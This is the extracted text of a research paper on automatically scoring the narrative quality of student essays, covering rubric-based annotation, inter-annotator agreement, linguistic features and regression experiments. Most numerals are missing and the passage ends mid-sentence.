[ ]guo zhe, zang shunlai, wei gongji, chen feng, and guo cheng, secondary development technology of catia v and its application in design of stamping dies, die & mould industry, vol. , , pp. – . [ ]li wei, zhang yongyan, development and application of conversion software of nc program based on catia, aeronautical manufacturing technology, vol. , , pp. – . towards evaluating narrative quality in student writing swapna somasundaran , michael flor , martin chodorow hillary molloy binod gyawali laura mcculla educational testing service, rosedale road, princeton, nj , usa hunter college and the graduate center, cuny, new york, ny , usa educational testing service, new montgomery street, san francisco, ca , usa {ssomasundaran,mflor,hmolloy, bgyawali,lmcculla}@ets.org martin.chodorow@hunter.cuny.edu abstract this work lays the foundation for automated assessments of narrative quality in student writing. we first manually score essays for narrative-relevant traits and sub-traits, and measure inter-annotator agreement. we then explore linguistic features that are indicative of good narrative writing and use them to build an automated scoring system. experiments show that our features are more effective in scoring specific aspects of narrative quality than a state-of-the-art feature set. introduction narrative, which includes personal experiences and stories, real or imagined, is a medium of expression that is used from the very early stages of a child’s life. narratives are also employed in various capac- ities in school instruction and assessment. for ex- ample, the common core state standards, an ed- ucational initiative in the united states that details requirements for student knowledge in grades k- , employs literature/narratives as one of its three language arts genres. with the increased focus on automated evaluation of student writing in educa- tional settings (adams, ), automated methods for evaluating narrative essays at scale are becoming increasingly important. automated scoring of narrative essays is a chal- lenging area, and one that has not been explored ex- tensively in nlp research. previous work on auto- mated essay scoring has focused on informational, argumentative, persuasive and source-based writing constructs (stab and gurevych, ; nguyen and litman, ; farra et al., ; somasundaran et al., ; beigman klebanov et al., ; shermis and burstein, ). similarly, operational essay scoring engines (attali and burstein, ; elliot, ) are geared towards evaluating language profi- ciency in general. in this work, we lay the ground- work and present the first results for automated scor- ing of narrative essays, focusing on narrative quality. one of the challenges in narrative quality anal- ysis is the scarcity of scored essays in this genre. we describe a detailed manual annotation study on scoring student essays along multiple dimensions of narrative quality, such as narrative development and narrative organization. using a scoring rubric adapted from the u.s. common core state stan- dards, we annotated essays written for differ- ent essay-prompts by students from three different grade levels. this data set provides a variety of story types and language proficiency levels. we measured inter-annotator agreement to understand reliability of scoring stories for traits (e.g., development) as well as sub-traits (e.g., plot development and the use of narrative techniques). a number of techniques for writing good stories are targeted by the scoring rubrics. 
we implemented a system for automatically scoring different traits of narratives, using linguistic features that capture some of those techniques. we investigated the effec- tiveness of each feature for scoring narrative traits and analyzed the results to identify sources of errors. the main contributions of this work are as fol- lows: ( ) to the best of our knowledge, this is the first detailed annotation study on scoring narra- tive essays for different aspects of narrative quality. ( ) we present an automated system for scoring nar- rative quality, with linguistic features specific to en- coding aspects of good story-telling. this system outperforms a state-of-the-art essay-scoring system. ( ) we present analyses of trait and overall scoring of narrative essays, which provide insights into the aspects of narratives that are easy/difficult for hu- mans and machines to evaluate. related work . narrative assessments researchers have approached manual assessments of creative writing in a variety of ways. the “consensual assessment technique” (amabile, ; broekkamp et al., ) evaluates students’ creative writing on criteria such as creativity, originality and technical quality. consensus scoring is used, but the genre is considered to be too subjective for close agreement between scorers. story-telling in children has been studied and evaluated using a number of techniques. for ex- ample, the test of narrative language (gillam and pearson, ) is a standardized, picture-based, norm-referenced measure of narrative ability, used to identify language disabilities. stein and glenn ( ) used a story-schema approach to evaluate story recall in school children. miller and chapman ( ) adapted it to score story re-telling, mainly for clinical purposes. similarly, narrative re-telling is recorded and analyzed for length, syntax, cohesion, and story grammar in the strong narrative assess- ment procedure (strong et al., ). the index of narrative complexity (petersen et al., ) scores oral narratives on several dimensions and is used to study the effectiveness of clinical interventions. olinghouse and leaird ( ) used picture- prompts for eliciting narratives from about stu- dents at the nd and th grade levels. the stories were evaluated for organization, development and creative vocabulary, but the study focused on vocab- ulary characteristics at different grade levels. mck- eough et al. ( ) studied student narratives in order to compare talented and average writers. halpin and moore ( ) analyzed students’ re- telling of exemplar stories. they focused on event extraction, with the final goal of providing advice in an interactive story-telling environment. passonneau et al. ( ) annotated oral retellings of the same story on three consecutive days in order to study and model children’s comprehension. . narrative analysis in computational linguistics research on narratives in computational linguistics has employed fables, fairy tales, and literary texts, aiming at representing, understanding and extract- ing information, e.g., charniak ( ). goyal et al. ( ) analyzed aesop’s fables, producing auto- matic plot-unit representations (lehnert, ) with a task-specific knowledge base of affect. character traits and personas in stories have also been analyzed.
for example, elsner ( ) pro- posed a rich representation of story-characters for the purpose of summarizing and representing nov- els. bamman et al. ( ) automatically inferred latent character types in english novels. valls- vargas et al. ( ) extracted characters and roles from russian folk tales, based on their actions. chaturvedi et al. ( ) analyzed short stories for characters’ desires and built a system to recognize desire fulfillment, using textual entailment. researchers have also studied social networks and have modeled relationships in stories (elson et al., ; celikyilmaz et al., ). agarwal et al. ( ) modeled character interactions from alice in wonderland for the purpose of social network anal- ysis. chaturvedi et al. ( ) modeled character relationships in novels, using structured prediction. wiebe ( ) proposed a method for tracking psychological points of view in narratives, looking at private states and subjective sentences. oves- dotter alm and sproat ( ) studied emotional se- quencing and trajectories in grimm’s fairy tales. ware et al. ( ) analyzed dimensions of conflict in four simple, constructed stories, with the goal of evaluating story content. similarly, swanson et al. ( ) analyzed blog narratives for narrative clause sub-types such as orientation, action and evaluation. reagan et al. ( ) used sentiment analysis to gen- erate emotional profiles for english novels. nlp methods have also been used for modeling and understanding narrative structures (finlayson, ; elson, ). see finlayson ( ) and mani ( ) for detailed literature surveys. one important aspect of a narrative is that it conveys a sequence of events (fludernik, ; almeida, ). chambers and jurafsky ( ; ) presented techniques for the automatic acqui- sition of event chains and event schemas (chambers, ), which are related to earlier notions of scripts as prepackaged chunks of knowledge (schank and abelson, ). this line of research has received a great deal of attention (nguyen et al., ; bal- asubramanian et al., ; jans et al., ; mcin- tyre and lapata, ). for narratives, ouyang and mckeown ( ) focused on automatic detection of compelling events. bogel et al. ( ) worked on extraction and temporal ordering of events in narra- tives. based on the ‘narrative cloze test’ (chambers and jurafsky, ), mostafazadeh et al. ( ) pre- sented a framework for evaluating story understand- ing algorithms, the ‘story cloze test’, whose goal is to predict a held-out continuation of a short story. our research differs significantly from previous work. we aim to evaluate, on an integer scale, the quality of narratives in student-generated essays. in- sights from previous work on narrative analysis can be useful for our purposes if they capture narrative techniques employed by student writers, and if they correlate with scores representing narrative quality. it is still an open question whether an elaborate rep- resentation and understanding of the story is needed for evaluating student writing, or whether encod- ing features that capture different narrative aspects might be sufficient. further, depending on the type of story, not all aspects of narrative analysis may come into play. for example, plot construction and narrative elements such as conflict may be central to creating a hypothetical story about an antique trunk, but not so much in a personal story about a travel experience. to the best of our knowledge, this work makes a first attempt at investigating the evaluation of narrative quality using automated methods. . 
automated essay scoring there are a number of automated essay scoring (aes) systems, many of which are used operationally, such as e-rater® (attali and burstein, ), intellimetric (elliot, ), the intelligent essay assessor (landauer et al., ) and project essay grade (page, ). however, these previous studies have not been focused on narratives. in a somewhat related study to this one, somasundaran et al. ( ) scored oral narratives that were generated by international students in response to a series of pictures. some of the features used in that study overlap with our work due to the overlap in the genre; however, their focus was on scoring the response for language proficiency. graph features, which we have used in this work, have been shown to be effective in capturing idea development in essays (somasundaran et al., ). this work also employs graph features, but it is one of the many we explore for encoding the various linguistic phenomena that characterize good narratives. data our data comprises narrative essays written by school students in the criterion® program (https://criterion.ets.org/criterion), an online writing evaluation service from educational testing service. it is a web-based, instructor-led writing tool that helps students plan, write and revise their essays. narrative essays were obtained from grade levels , and . each essay was written in response to one of story-telling prompts related to personal experiences, hypothetical situations, or fictional stories. below are some example prompts: [personal experience] there are moments in everyone’s lives when they feel pride and accomplishment after completing a challenging task. write a story about your proudest moment. [hypothetical situation] pretend that one morning you wake up and find out that you’ve become your teacher for a day! what happened? what do you do? do you learn anything? write a story about what happens. use your imagination! [fictional story] throughout the years, many have placed messages in sealed bottles and dropped the bottles into the ocean where they eventually washed up on foreign shores. occasionally the finder has even contacted the sender. write a story about finding your own message in a bottle. the average essay length in our data is words, with a range of to words and a standard deviation of . a sample essay, “message in a bottle”, in response to the fiction story prompt above is presented below: last year, i went back to my hometown. there was a big beautiful beach on which i had often played as a child. nevertheless, when i went to the beach, it changed. i looked a great deal of trash, and many animal disappeared. without original breathtaking scene, there had been destroyed very well. all of a sudden, i watched a bottle when i walked on the beach. i opened the bottle with my curiosity. there was a message in the bottle. the message was “whoever you are, please help this beach. we need more clean beach to survive.” i was surprised that this message should be from the sea creature. they need humans’ help, or they would die. therefore, i persuaded the other people who live there to clean the beach immediately. they all agreed to come and to help those animals. finally, with a lot of people’s help, the beach became beautiful as before. i thought that those who under the sea were very comfortable and happy to live a clean surroundings.
scoring narrative essays our work focuses on automatically evaluating and scoring the proficiency of narrative construction in student essays. therefore, we use a rubric created by education experts and teachers, and presented by smarter balanced, an assessment aligned to u.s. state standards for grades k- (https://portal.smarterbalanced.org/library/en/performance-task-writing-rubric-narrative.pdf). . trait scoring the scoring rubric provides guidelines for scoring essays along three traits (dimensions): purpose/organization (hereafter, referred to as organization or org.), development/elaboration (development or dev.) and conventions (or conv.). each of the dimensions is described below. . . organization organization is concerned with the way a story is arranged in general. it focuses on event coherence, on whether the story has a coherent start and ending, and whether there is a plot to hold all the pieces of the story together. this dimension is judged on a scale of - integer score points, with being the highest score. the rubric provides the following criteria for an essay of score point in terms of five aspects or sub-traits: “the organization of the narrative is fully sustained and the focus is clear and maintained throughout: . an effective plot; . effectively establishes character/setting/pov; . consistent use of a variety of transitioning strategies; . natural, logical sequencing of events; . effective opening/closing.” an essay is judged non-scorable if it is insufficient, written in a language other than english, off-topic, or off-purpose. such essays are assigned a score of in our scheme. . . development development focuses on how the story is developed. it evaluates whether the story provides vivid descriptions, and whether there is character development. this dimension is also judged on a scale of - integer score points, with being the highest score. as in the scoring of organization, in our scheme, non-scorable essays are assigned a score for development. the rubric provides the following criteria for an essay of score point in terms of five aspects or sub-traits: “the narrative provides thorough, effective elaboration using relevant details, dialogue, and/or description: . clearly developed character/setting/events; . connections made to source materials; . effective use of a variety of narrative techniques; . effective use of sensory, concrete, and figurative language; . effective, appropriate style.” . . conventions this dimension evaluates the language proficiency, judged on a scale of - integer score points, with being the highest score. according to the rubrics, the following characterizes an essay of score point : “the response demonstrates an adequate command of conventions: adequate use of correct sentence formation, punctuation, capitalization, grammar usage, and spelling.” . sub-trait scoring as noted above, organization and development are each composed of sub-traits. we scored these sub-traits manually using the same -point scale as the main trait scores. this yields sub-trait scores in addition to the main trait scores, for a total of manually assigned scores per essay. we produced guidelines and selected a small set of benchmark essays for training two scorers. . narrative and total scores based on the human-assigned trait scores, we derive narrative and total composite scores for each essay. the narrative score for each essay is calculated by summing the organization and development trait scores.
this gives the essay a narrative score on an integer scale from to . we sum up the three trait scores (organization + development + conventions) to get a total score on an integer scale from to . even though narrative and total composites are not defined separately/independently from their components, they provide us with an estimate of how manual and automated scoring will perform on these data for scenarios where, for example, a single overall score has to be assigned. annotation and data statistics two research assistants, both co-authors on the paper but not involved in system development, performed the scoring. both annotators are native speakers of english with more than four years of linguistic annotation experience. using the scoring rubric described above, the lead annotator created a guideline and benchmark dataset of essays spanning all score points. this was used for training a second annotator and three researchers (all co-authors on the paper), and the resulting feedback was used to refine the guidelines. two rounds of training were conducted, with and essays respectively. a score discrepancy of more than one point for any of the traits triggered a discussion in order to bring the scores closer (that is, the scores should only differ by one point). exact agreement was not sought due to the very subjective nature of judging stories. one of the researchers served as adjudicator for the discussions. no specific training was performed for the sub-traits; disagreements on sub-traits were discussed only within trait-level discussions. once the training was completed, a total of essays were scored. of these, essays were singly scored and essays were double-scored to measure agreement. scoring of each essay thus involved assigning scores ( traits + sub-traits) and took approximately to minutes (for data requests see https://www.ets.org/research/contact/data_requests/). table shows the distribution of scores across the score-points for the three traits.
table : score distributions for traits (columns: score, org., dev., conv.).
. inter-annotator agreement to calculate agreement, we use quadratic weighted kappa (qwk) (cohen, ), a well-established metric in assessment that takes into account agreement due to chance. it is equivalent to a form of intra-class correlation and, in most cases, is comparable to pearson’s r. the qwks calculated over doubly annotated essays are reported in table . the three main traits are shown in bold, the sub-traits are prefixed with a ”:”, and the composite traits (narrative and total) are shown in italics.
table : inter-annotator agreement (trait:sub-trait qwk) for organization (:plot, :characters/setting/pov, :transitioning, :sequencing, :opening/closing), development (:characters/setting/events, :narrative techniques, :language, :source materials, :style), convention, narrative (org. + dev.), and total (org. + dev. + conv.).
for the organization and development traits, which capture the narrative aspects of writing, the “message in a bottle” sample essay in section received scores of org.: , dev.: , and conv.: . the high score for conventions reflects the rubric’s requirement of adequate (but not stellar) command of language usage. scoring agreement is quite high: organization (qwk= . ) and development (qwk= . ). this result is promising as it indicates that organization and development of story-telling can be reliably scored by humans.
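since quadratic weighted kappa is the agreement metric used throughout, a minimal sketch of how it can be computed is given below. this is not the authors' code; it relies on scikit-learn's cohen_kappa_score with quadratic weights, and the two score vectors are invented toy data, not the actual annotations.

```python
# A minimal sketch of quadratic weighted kappa (QWK), the agreement metric
# discussed above. The two score vectors below are invented toy data.
from sklearn.metrics import cohen_kappa_score

# Hypothetical trait scores (0-4) assigned by two annotators to ten essays.
rater_a = [3, 2, 4, 1, 0, 3, 2, 2, 4, 1]
rater_b = [3, 3, 4, 1, 1, 2, 2, 3, 4, 1]

# weights="quadratic" penalizes large disagreements much more than adjacent
# ones, which is why one-point discrepancies cost relatively little.
qwk = cohen_kappa_score(rater_a, rater_b, weights="quadratic")
print(f"QWK = {qwk:.3f}")
```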
surprisingly, the agreement for the non-narrative dimension, conventions, is only rather moderate (qwk= . ). discussion among the two annotators revealed that the criteria for the score points in conventions were very subjective. for example, they had difficulty deciding on when a conventions violation, such as a specific grammatical error, was severe, and how much variety among the error types was needed to move the conventions score from one score point to another. table shows that agreement for all sub-traits is lower than agreement for the corresponding trait. sub-trait agreement results also show that some story traits are more reliably scored than others. for example, it is easier to evaluate good openings and closings in stories (qwk= . ) than to evaluate the quality of story style (qwk= . ). evaluation of stylistic devices and whether they indeed enhance the story is rather subjective. agreement for the narrative and total scores is also quite good. narrative achieves a higher qwk than its individual components. the high agreement of the total scores is interesting, as it incorporates the conventions scores, on which substantial agreement was not achieved. . inter-trait correlations previous research on writing has shown that traits are usually correlated (lee et al., ; bacha, ; klein et al., ). we also observed this in our data. inter-trait correlations (pearson’s r) are shown in table . scores for organization and development are highly correlated (r = . ), and each is also correlated with conventions (r = . and . , respectively), albeit not as strongly. not surprisingly, the composite scores, narrative and total, are highly correlated to their components.
table : score correlations for traits, narrative and total (rows and columns: org., dev., conv., nar., tot.).
linguistic features we used the scoring rubric as a guideline for exploring construct-relevant features with a view towards automated analysis. we developed sets of features for the different narrative characteristics. each set is described in detail in the following sections. . transition feature set effective organization of ideas and events is typically achieved with the use of discourse markers. in order to encode effective transitioning, we compiled a transition-cue lexicon, and constructed features based on it. we compiled a list of discourse cues from the penn discourse treebank (pdtb) manual (prasad et al., ), and we manually collected a list of transition cues from the web by mining websites that provide tips on good essay/narrative writing. the latter, with a total of unigrams and multi-word expressions, is more focused on cues that are used commonly to write stories (e.g., cues that provide locational or temporal connections) than the former. using the lexicon, we extracted two features from each essay: the number of cues in the essay and that number divided by the essay length. these two features form the transition feature set (a short illustrative sketch appears below). . event-oriented feature set events are the building blocks of narratives, and good story-telling involves skillfully stringing events together. we construct an event-based feature set, events, to capture event cohesion and coherence. following the methodology proposed by chambers and jurafsky ( ), we built a database of event pairs from the gigaword fifth edition corpus (parker et al., ).
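the transition feature set described above reduces to a lexicon lookup; the sketch below makes that concrete. the cue list here is a tiny invented placeholder, not the pdtb-derived and web-mined lexicon the authors compiled.

```python
# Sketch of the transition feature set: a raw count of transition cues and
# that count normalized by essay length. The cue list is a small invented
# stand-in for the much larger lexicon described above.
import re

TRANSITION_CUES = ["after that", "meanwhile", "suddenly", "finally",
                   "however", "later", "at first", "in the end"]

def transition_features(essay: str):
    text = essay.lower()
    tokens = re.findall(r"[a-z']+", text)
    # Count every (possibly multi-word) cue occurrence in the essay.
    cue_count = sum(text.count(cue) for cue in TRANSITION_CUES)
    normalized = cue_count / len(tokens) if tokens else 0.0
    return {"cue_count": cue_count, "cue_count_norm": normalized}

print(transition_features("At first I was afraid. Finally, however, I went in."))
```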
specifically, we used the annotated gigaword distribution (napoles et al., ), which has been automatically annotated with typed dependency information (de marneffe and manning, ). following chambers and ju- rafsky ( ), we define events as verbs in a text (excluding be/have/do) and pairs of events are de- fined as those verbs that share arguments in the text. in the present work we limit our scope to the fol- lowing set of (typed dependency) arguments: nsubj, dobj, nsubjpass, xsubj, csubj, csubjpass. to estimate event cohesion, we extract all event pairs from an essay after pre-processing it with the stanford core nlp toolkit (manning et al., ). event tokens from the essay are linked into pairs when they share a filler in their arguments. for essays, we use stanford co-reference resolution for matching fillers of verb-argument slots. for all event pairs extracted from an essay, we query the events database to retrieve the pair association value (we use the point-wise mutual information (church and hanks, )). we define three quantitative mea- sures to encode event cohesion: ( ) total count of event pairs in the essay; ( ) proportion of in-essay event-pairs that are actually found in the events database; ( ) proportion of in-essay event-pairs that have substantial association (we use pmi ≥ ). we also capture aspects of coherent event se- quencing. for this, we compute event chains, which are defined as sequences of events that share the same actor or object, in subject or direct object role (chambers and jurafsky, ). specifically, we en- code the following additional features in the events feature set: ( ) the length of the longest chain found in the essay (i.e., number of event pairs in the chain); ( ) the score of the longest chain (computed as the sum of pmi values for all links (event pairs) of the chain); ( ) the length of the second longest chain found in the essay; ( ) the score of the highest scor- ing chain in the essay; ( ) the score of the second highest scoring chain in the essay; ( ) the score of the lowest scoring chain is the essay; ( ) the sum of scores for all chains in the essay. for each of the features - , we also produce a feature that is normalized by the log of the essay length (log word- count). . subjectivity-based feature set evaluative and subjective language is used to de- scribe characters (e.g., foolish, smart), situations (e.g., grand, impoverished) and characters’ private states (e.g., thoughts, beliefs, happiness, sadness) (wiebe, ). these are evidenced when charac- ters are described and story-lines are developed. we use two lexicons for detecting sentiment and subjective words: the mpqa subjectivity lexicon (wilson et al., ) and a sentiment lexicon, as- sess, developed for essay scoring (beigman kle- banov et al., ). mpqa associates a posi- tive/negative/neutral polarity category to its entries, while assess assigns a positive/negative/neutral polarity probability to its entries. we consider a term from assess to be polar if the sum of positive and negative probabilities is greater than . (based on manual inspection of the lexicon). the neutral cat- egory in mpqa comprises subjective terms that in- dicate speech acts and private states (e.g., view, as- sess, believe), which is valuable for our purposes. the neutral category in assess consists of non- subjective words (e.g., woman, technologies), which we ignore. the polar entries of the two lexicons dif- fer too. assess provides polarity for words based on the emotions they evoke. 
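the event-cohesion measures described above depend on a large pmi database built from gigaword with corenlp parses and coreference; the sketch below substitutes a tiny hand-made dictionary and pre-extracted (verb, argument) tuples, so the pipeline pieces (pairing events that share an argument, looking up their association, thresholding on pmi) can be seen in isolation. it is an illustration, not the authors' implementation.

```python
# Sketch of the event-cohesion features: pair up verbs that share an argument
# filler, look up each pair's association in an event-pair database, and
# compute the cohesion measures described above. The PMI table and the
# (verb, argument) tuples are invented stand-ins for the Gigaword-derived
# database and the CoreNLP/coreference preprocessing used in the paper.
from itertools import combinations

# Hypothetical PMI values for verb pairs (keys stored in sorted order).
EVENT_PMI = {("find", "open"): 3.1, ("open", "read"): 2.4, ("find", "read"): 0.7}

def event_cohesion_features(events, pmi_db, threshold=2.0):
    """events: list of (verb, argument) tuples extracted from one essay."""
    pairs = []
    for (v1, a1), (v2, a2) in combinations(events, 2):
        if a1 == a2 and v1 != v2:          # the two events share an argument
            pairs.append(tuple(sorted((v1, v2))))
    n_pairs = len(pairs)
    known = [p for p in pairs if p in pmi_db]
    strong = [p for p in known if pmi_db[p] >= threshold]
    return {
        "event_pair_count": n_pairs,
        "frac_in_db": len(known) / n_pairs if n_pairs else 0.0,
        "frac_strong": len(strong) / n_pairs if n_pairs else 0.0,
    }

# "i found a bottle, opened the bottle, and read the message."
essay_events = [("find", "bottle"), ("open", "bottle"), ("read", "message")]
print(event_cohesion_features(essay_events, EVENT_PMI))
```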
for example, alive, awakened and birth are highly positive, while crash, bombings and cyclone are strongly negative. we construct a subjectivity feature set comprised of features encoding, for each essay, the presence (a binary feature) and the count of mpqa and as- sess polar words and mpqa neutral words. . detailing feature set providing specific details, such as names to char- acters, and describing the story elements, helps in developing the narrative and providing depth to the story. proper nouns, adjectives and adverbs come into play when a writer provides descriptions. thus, we create a details feature set comprised of a total of features encoding, separately, the presence (a binary feature) and the count of proper nouns, ad- jectives and adverbs. . graph feature set graph statistics have been reported to be effective for capturing development and coherence in essays (mesgar and strube, ; somasundaran et al., ). we closely follow the implementation and features described in somasundaran et al. ( ) for capturing narrative development (due to space constraints we refer the reader to the original paper). graphs were constructed from essays by represent- ing each content word (word type) in a sentence as a node in the graph. links were drawn between words belonging to adjacent sentences. features based on connectivity, shape and pagerank were extracted, giving a total of graph features. specifically, the features used were: percentage of nodes with de- grees one, two and three; the highest, second-highest and median degree in the graph; the highest degree divided by the total number of links; the top three pagerank values in the graph, their respective neg- ative logarithms, and their essay length-normalized versions; the median pagerank value in the graph, its negative log and essay length-normalized ver- sion. . content word usage content word usage, also known as lexical density (ure, ), refers to the amount of open-class (con- tent words) used in an essay. the greater proportion of content words in a text, the more difficult or ad- vanced it is (yu, ; o’loughlin, ), and it has been suggested that, for academic discourse, too much lexical density is detrimental to clarity (hal- liday and martin, ). the content feature is the inverse of the proportion of content words (pos tagged noun/verb/adjective/ adverb) to all words of an essay. . pronoun usage the use of pronouns in story-writing has several im- portant aspects. on one hand, pronouns can indi- cate the point of view (perspective) in which the story is written (fludernik, ; rimmon-kenan, ). perspective is important in both construction and comprehension of narrative (rimmon-kenan, ). the use of pronouns is also related to reader engagement (mentzell et al., ) and im- mersion (oatley, ). stories with first person pronouns lead to stronger reader immersion, while stories written in third person lead to stronger reader arousal (hartung et al., ). in our data, we counted personal pronouns (e.g., i, he, it), including contractions (e.g., he’s), and possessive pronouns (e.g., my, his). for each story, the counts were nor- malized by essay length. a single feature, pronoun, was encoded using the proportion of first and third person singular pronouns in the essay. . modal feature as an account of connected events, a narrative typ- ically uses the past tense. by contrast, modals ap- pear before untensed verbs and generally refer to the present or the future. 
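the graph feature set described above follows somasundaran et al.; a rough sketch under simplifying assumptions (plain regex tokenization and a small stop-word list standing in for pos-based content-word detection) is given here, using networkx for the degree and pagerank statistics. it is meant only to illustrate the construction, not to reproduce the original feature values.

```python
# Rough sketch of the graph feature set: content words become nodes, words in
# adjacent sentences are linked, and degree/PageRank statistics summarize the
# graph. Tokenization and content-word filtering are crude stand-ins for the
# POS-based processing used in the original work.
import re
import networkx as nx

STOP = {"the", "a", "an", "and", "i", "to", "of", "was", "it", "in", "on"}

def graph_features(essay: str):
    sents = [s for s in re.split(r"[.!?]+", essay.lower()) if s.strip()]
    content = [[w for w in re.findall(r"[a-z']+", s) if w not in STOP]
               for s in sents]
    g = nx.Graph()
    for words in content:
        g.add_nodes_from(words)
    # Link every content word to every content word of the next sentence.
    for cur, nxt in zip(content, content[1:]):
        g.add_edges_from((w1, w2) for w1 in cur for w2 in nxt if w1 != w2)
    if g.number_of_nodes() == 0:
        return {}
    degrees = sorted((d for _, d in g.degree()), reverse=True)
    pr = sorted(nx.pagerank(g).values(), reverse=True)
    return {
        "max_degree": degrees[0],
        "median_degree": degrees[len(degrees) // 2],
        "top_pagerank": pr[0],
        "frac_degree_one": sum(d == 1 for d in degrees) / len(degrees),
    }

print(graph_features("I found a bottle on the beach. The bottle held a message. "
                     "The message asked for help."))
```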
they express the degree of ability (can, could), probability (shall, will, would, may, might), or obligation/necessity (should, must). an overabundance of modals in an essay might be an indication that it is not a narrative or is only marginally so. this idea is captured in the modal feature, which is the proportion of modals to all words of an essay. . stative verbs stative verbs are verbs that describe states, and are typically contrasted with dynamic verbs, which describe events (actions and activities) (vendler, ). in narrative texts, stative verbs are often used in descriptive passages (smith, ), but they do not contribute to the progression of events in a story (almeida, ; prince, ). our conjecture is that if a text contains too many stative verbs, then it may not have enough of an event sequence, which is a hallmark of a narrative. we compiled a list of english stative verbs (e.g., know, own, resemble, prefer) from various linguistic resources on the web. during processing of an essay, we identify verbs by pos tags, and stative verbs via list-lookup. sepa- rately, we identify copular uses of “to be” and count them as statives. our feature, statives, is the propor- tion of stative verbs out of all verbs in an essay. experiments our experiments investigate the following ques- tions: ( ) is it possible to score narrative quality traits in essays using automated methods? ( ) which of our feature sets are effective for scoring narrative quality traits? ( ) how do our narrative-inspired fea- tures perform as compared to a baseline that is com- petitive but does not specifically address the narra- tive construct? ( ) how does overall scoring of nar- rative essays differ from trait scoring? ( ) what are the best feature combinations for narrative scoring? to answer these questions, we built and evaluated scoring systems for each trait, overall narrative and total scores. in each case, we performed detailed ablation studies at the feature-set level. we have features sets ( feature sets described above plus a baseline feature set); thus feature set combi- nations were investigated. as our traits are highly correlated, we used all of our features for building systems for each trait, leaving it to the ablation pro- cess to reveal the most promising feature set combi- nation. . baseline e-rater (attali and burstein, ), a state-of-the- art commercial system for automatic essay scor- ing, uses a comprehensive suite of features cover- ing many aspects of writing quality, such as gram- mar, language use, mechanics, fluency, style, or- ganization, and development. we use all of the features from e-rater, a total of features, as the baseline feature set. while e-rater is not designed for trait scoring, it incorporates features that ad- dress the traits of interest in this work. develop- ment and organization are captured by features that, among other things, count and encode the num- ber and length of discourse elements such as the- sis, main points, supporting ideas, and conclusion (burstein et al., ). . results we experimented with linear regression, sup- port vector regression (rbf kernel), random forests, and elastic net learners from the scikit- learn toolkit (pedregosa et al., ), with -fold cross-validation on essays. as linear regres- sion results were consistently better, both for base- line and for our features, we only report results from this learner. 
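the scoring experiments use linear regression with 10-fold cross-validation, followed by trimming of out-of-range predictions (described just below) and qwk evaluation. a minimal sketch of that loop on synthetic data follows; the feature matrix, score range, and the rounding of predictions to integer score points before computing qwk are placeholders and assumptions, and the ablation over feature-set combinations is omitted.

```python
# Minimal sketch of one trait-scoring experiment: linear regression with
# k-fold cross-validation, trimming (clipping) predictions into the valid
# score range, and QWK evaluation against the human scores. The random data
# below stands in for the real feature matrix and trait scores.
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import cohen_kappa_score

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 12))        # placeholder feature matrix
y = rng.integers(0, 5, size=200)      # placeholder trait scores 0-4

# Cross-validated predictions from the linear regression learner.
pred = cross_val_predict(LinearRegression(), X, y, cv=10)

# Trimming: predictions outside the score range get the min/max score; rounding
# to the nearest integer score point (an assumption here) allows QWK scoring.
pred = np.clip(pred, y.min(), y.max())
pred = np.rint(pred).astype(int)

print("QWK =", cohen_kappa_score(y, pred, weights="quadratic"))
```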
trimming of the predicted linear regression output was performed; that is, if the predicted score was above the max score, or below the min score, it was assigned the max or the min score, respectively. bootstrapping experiments (berg-kirkpatrick et al., ; efron and tibshirani, ) were performed to test for statistical significance (we used bootstrap samples). for each trait-scoring experiment, we extracted all the features (described in section ) from the essays and used the corresponding human trait scores for training and testing. thus, the input essays and their features are the same across all experiments. what varies is the trait to be predicted and, consequently, the performance of feature sets as well as the best feature combination. table shows the performance of baseline, the individual features, all features, and the best feature combination, for all three traits, overall narrative and total scoring. performance of individual features that exhibit some predictive power is also shown in the table. the single-measure features modal, pronoun, content, and stative show no predictive power individually (qwks = ) and are omitted from the table for space reasons. organization understandably, baseline performs poorly for scoring organization in narratives, as its focus is evaluating overall writing proficiency. individual feature sets, details, transition, events and subjectivity, have some predictive capability, but it is not very high. this is not surprising as they each encode only a specific aspect of narrative quality. the graph feature set outperforms the baseline feature set, but the difference is not statistically significant. when all features are put together (all features), the qwk obtained is . , which is substantially higher than baseline (p < . ), but not as good as the best performing feature set. the best combination of our proposed features (details+ modal+ pronoun+ content+ graph+ subjectivity+ transition) achieves a qwk of . , substantially better performance than baseline (p < . ), reflecting an improvement of percentage points. this result indicates that developing features to encode narrative quality is important for evaluating organization in narrative essays. most of our explored feature sets, even those that do not individually perform well, are part of the best system. two feature sets that are not present in the best feature combination are statives and events. the exclusion of the former is reasonable – stative verbs are related to story development. the exclusion of events is surprising, as it intuitively encodes the coherence of events, impacting the organization of the essay. the best feature combination that includes events achieves a qwk of . . the baseline features are not part of the best system, confirming our intuition that features that specifically encode narrative quality are needed for this narrative trait. from our ablation results, we inspected the top best-performing feature set combinations in order to determine which features consistently produce good systems. pronoun, content, graph and subjectivity were a part of all of the top systems, transition was in , details was in and modal was in feature sets. this suggests that singleton features such as pronoun and content are indeed useful, even though they cannot be used in isolation.
table : performance (qwk) on predicting traits and narrative and total scores (rows: baseline, details, transition, events, subjectivity, graph, all features, best feature combination*; columns: organization, development, conventions, narrative, total); best feature combinations: *for organization: details+ modal+ pronoun+ content+ graph+ subjectivity+ transition; *for development: details+ modal+ content+ graph+ statives+ transition; *for conventions: baseline+ details+ graph; *for narrative: baseline+ details+ modal+ pronoun+ content+ graph+ statives+ subjectivity+ transition; *for total: details+ baseline+ modal+ content+ graph+ subjectivity+ transition.
development we observe similar trends seen with the organization trait – the baseline feature set does not capture development very effectively, and some individual feature sets have predictive power for this trait but perform poorly. graph outperforms baseline, but this is not statistically significant. using all of the available features produces qwk= . , a significant improvement over baseline (p < . ). the best system achieves a performance of qwk= . , outperforming baseline by percentage points (p < . ). the best feature combination contains of the proposed features and differs from the best features for organization by the inclusion of statives and the exclusion of pronoun and subjectivity. content, graph and transition also occur in all of the top best-performing systems. conventions even though scoring language conventions is not the focus of this work, we were curious how well our features evaluate this dimension. we observe that overall performance is lower than for the other two traits, which is to be expected as we do not have high human inter-rater agreement to start with. the baseline e-rater feature set is the best performing individual feature set, and the narrative-specific features perform rather poorly. using all features (qwk= . ) only produces a point improvement over baseline, which is not statistically significant. adding details and graph to baseline produces the best system, an improvement of percentage points, qwk= . (p < . ). all three features are also the only feature sets that consistently occur in all the top-performing systems. narrative in general, the results for narrative scoring follow the same trends as the results for organization. graph features outperform the baseline significantly (p < . ). using 